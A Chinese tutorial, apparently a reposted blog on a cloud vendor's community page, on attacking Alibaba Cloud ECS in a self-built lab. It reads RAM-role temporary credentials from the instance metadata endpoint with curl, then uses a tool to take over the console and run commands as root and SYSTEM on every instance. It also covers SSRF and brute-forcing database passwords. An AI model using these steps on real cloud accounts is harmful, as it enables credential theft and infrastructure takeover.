云上攻防-云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

本文涉及的产品
云服务器 ECS,u1 4核8GB 1个月
云服务器 ECS,每月免费额度200元 3个月
云服务器 ECS,u1 4核16GB 1个月
简介: 云上攻防-云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

前言

元数据解释:


实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名,所有信息均实时生成,常用于快速辨别实例身份。)


细节方面可通过访问官网找元数据访问触发说明,阿里云示例:

https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata


云服务-弹性计算-元数据&SSRF&AK

环境搭建

这里是否启用实例元数据访问通道是默认开启的

创建RAM用户并添加相关测试权限

授予RAM角色,实例绑定RAM角色将授予实例该角色所拥有的所有权限

思路就是通过拿到的一台云服务器获取ecs用户临时凭证,进行该RAM用户下其他服务器的横向

1、前提条件:

-弹性计算配置访问控制角色
-SSRF漏洞或已取得某云服务器权限(webshell或漏洞rce可以访问触发url)


2、利用环境1:获取某服务器权限后横向移动

-获取关键信息

curl http://100.100.100.200/latest/meta-data/

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/

-获取临时凭证

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

此时这个临时凭证的权限就是RAM用户创建时的被授予的权限

这里斥巨资开了三台服务器进行演示 同一RAM管理

利用AK横向移动

cf工具访问配置

一键列出当前访问凭证的权限

一键接管控制台

这里也是直接登陆接管

一键列出当前访问凭证的云服务资源

一键命令执行

C:\Users\xxxxxx\Desktop\工具\cf_v0.5.0_windows_amd64>cf alibaba ecs exec -b
? 选择一个实例 (Choose a instance):  全部实例 (all instances)

1 i-2ze00ghuljor8w95rlsu (launch-advisor-20231012) > whoami && id && hostname && ifconfig

root
uid=0(root) gid=0(root) groups=0(root)
iZ2ze00ghuljor8w95rlsuZ
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.69.152  netmask 255.255.240.0  broadcast 172.22.79.255
        inet6 fe80::216:3eff:fe2e:823b  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:2e:82:3b  txqueuelen 1000  (Ethernet)
        RX packets 89310  bytes 132214717 (126.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7650  bytes 669146 (653.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2  bytes 140 (140.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2  bytes 140 (140.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


2 i-2ze387xap5u9w3plim4w (launch-advisor-20231012) > whoami && hostname && ipconfig

nt authority\system
iZp5u9w3plim4wZ

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::4dc3:a60d:1f10:54b3%4
   IPv4 地址 . . . . . . . . . . . . : 172.22.69.151
   子网掩码  . . . . . . . . . . . . : 255.255.240.0
   默认网关. . . . . . . . . . . . . : 172.22.79.253


3 i-2ze7ixs89bnm9ofchpso (launch-advisor-20231012) > whoami && id && hostname && ifconfig

root
uid=0(root) gid=0(root) groups=0(root)
iZ2ze7ixs89bnm9ofchpsoZ
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.69.150  netmask 255.255.240.0  broadcast 172.22.79.255
        inet6 fe80::216:3eff:fe36:8720  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:36:87:20  txqueuelen 1000  (Ethernet)
        RX packets 2300  bytes 1160685 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2296  bytes 288204 (281.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

不过对方服务器会告警emmmm:

3、利用环境2:某服务器上Web资产存在SSRF漏洞

搭建靶场太麻烦了,原理就是利用ssrf请求带外回显出临时凭证,其他操作同上

云服务-云数据库-外部连接&权限提升

环境搭建

默认不开启外网连接,所以安全性较高,

开通外网连接进行测试

1、帐号密码:

源码配置中找到(几率高)或爆破手段(几率低)

2、连接获取:

-白名单&外网 直接Navicat支持连接


-内网需要其中内网某一个服务器做转发

遇到了再来补

3、AK利用(权限提升)

相关实践学习
ECS云服务器新手上路
本实验会自动创建一台ECS实例。首先,远程登陆ECS实例,并部署应用。然后,登陆管理控制台,并对这台ECS实例进行管理操作。
7天玩转云服务器
云服务器ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,可降低 IT 成本,提升运维效率。本课程手把手带你了解ECS、掌握基本操作、动手实操快照管理、镜像管理等。了解产品详情:&nbsp;https://www.aliyun.com/product/ecs
相关文章
|
1月前
|
SQL 存储 安全
sql server 数据库实例
SQL Server 数据库实例是指在 SQL Server 中创建的一个独立的数据库环境。每个数据库实例都拥有自己的一套完整的数据库文件、配置设置、用户和权限等,可以独立地进行管理和操作。以下是关于
|
18天前
|
运维 安全 数据管理
数据管理DMS产品使用合集之是否可以为同一个实例下的不同数据库设置不同的审批规则
阿里云数据管理DMS提供了全面的数据管理、数据库运维、数据安全、数据迁移与同步等功能,助力企业高效、安全地进行数据库管理和运维工作。以下是DMS产品使用合集的详细介绍。
28 5
|
18天前
|
SQL 弹性计算 数据管理
数据管理DMS产品使用合集之sql server实例,已经创建了数据库,登录时提示实例已存在,该怎么处理
阿里云数据管理DMS提供了全面的数据管理、数据库运维、数据安全、数据迁移与同步等功能,助力企业高效、安全地进行数据库管理和运维工作。以下是DMS产品使用合集的详细介绍。
30 1
|
20天前
|
关系型数据库 MySQL 分布式数据库
PolarDB产品使用问题之如何将实例关联到本地的数据库
PolarDB产品使用合集涵盖了从创建与管理、数据管理、性能优化与诊断、安全与合规到生态与集成、运维与支持等全方位的功能和服务,旨在帮助企业轻松构建高可用、高性能且易于管理的数据库环境,满足不同业务场景的需求。用户可以通过阿里云控制台、API、SDK等方式便捷地使用这些功能,实现数据库的高效运维与持续优化。
|
2月前
|
存储 缓存 NoSQL
NoSQL缓存数据库的使用场景实例和命令速查表
【5月更文挑战第8天】Redis 是一个内存数据结构服务,用 C 编写,支持五种数据结构,不仅限于键值对。它用于缓存、消息队列、订阅/发布系统等,提供持久化、主从复制和集群支持。了解其核心数据结构和应用场景是有效利用 Redis 的关键。
84 3
NoSQL缓存数据库的使用场景实例和命令速查表
|
1月前
|
关系型数据库 MySQL 数据库
MySQL数据库——多表查询(4)-实例练习、多表查询总结
MySQL数据库——多表查询(4)-实例练习、多表查询总结
26 1
|
1月前
|
SQL 关系型数据库 数据库
17. Python 数据库操作之MySQL和SQLite实例
17. Python 数据库操作之MySQL和SQLite实例
80 2
|
20天前
|
SQL 关系型数据库 分布式数据库
PolarDB产品使用问题之在一个集群上创建多个数据库实例,是否可以做cpu和内存的配额指定
PolarDB产品使用合集涵盖了从创建与管理、数据管理、性能优化与诊断、安全与合规到生态与集成、运维与支持等全方位的功能和服务,旨在帮助企业轻松构建高可用、高性能且易于管理的数据库环境,满足不同业务场景的需求。用户可以通过阿里云控制台、API、SDK等方式便捷地使用这些功能,实现数据库的高效运维与持续优化。
|
1月前
|
数据库 关系型数据库 索引
通过实例理解数据库性能优化的方向
【6月更文挑战第3天】性能优化是提升用户体验的关键,尤其是对数据库的优化。慢速数据库可能导致页面加载延迟,造成用户流失。通过组合优化,可确保数据库高效运行,支持应用程序顺畅,提供无缝用户体验。
37 0
通过实例理解数据库性能优化的方向
|
2月前
|
存储 NoSQL MongoDB
使用mongodb数据库实例
【5月更文挑战第9天】MongoDB中的集合类似关系数据库的表,但不强制模式,允许嵌入式文档以实现更灵活的数据布局。安装MongoDB在Ubuntu上涉及添加源列表和更新,CentOS则需创建配置文件。MongoDB支持备份和恢复,以及全文搜索。其灵活模式和动态模式减少了开发中的复杂性,但并非无模式,大部分数据仍具结构化特点。
139 2